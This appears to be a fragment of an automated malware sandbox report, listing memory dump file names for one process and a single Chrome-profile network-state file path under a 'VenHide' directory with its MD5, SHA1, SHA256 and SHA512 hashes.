memory/1776-1347-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1348-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1349-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1350-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1351-0x000000001C850000-0x000000001CA03000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\VenHide\Default\Network\Network Persistent State
| MD5 | 3cc685567977a61d0c9ebfc1c21599a8 |
| SHA1 | ec42ae079bbb7d6b2aa15b9acd80b504971db201 |
| SHA256 | bb34a05b77a2d88b66e0ca6503c5948de261674fc19a73218ee592ddf541e967 |
| SHA512 | d6ac23658638bbebf4486d28a5d6fc0dce9d9d94b6b1fe5debe66cb2ca6e4dedf7e0e55bce5dbfcf3386f102e0262ddbbb4558f11036ccaa8719036479d5b84a |
memory/1776-1361-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1362-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1363-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1364-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1365-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1366-0x000000001C850000-0x000000001CA03000-memory.dmp
memory/1776-1367-0x000000001C850000-0x000000001CA03000-memory.dmp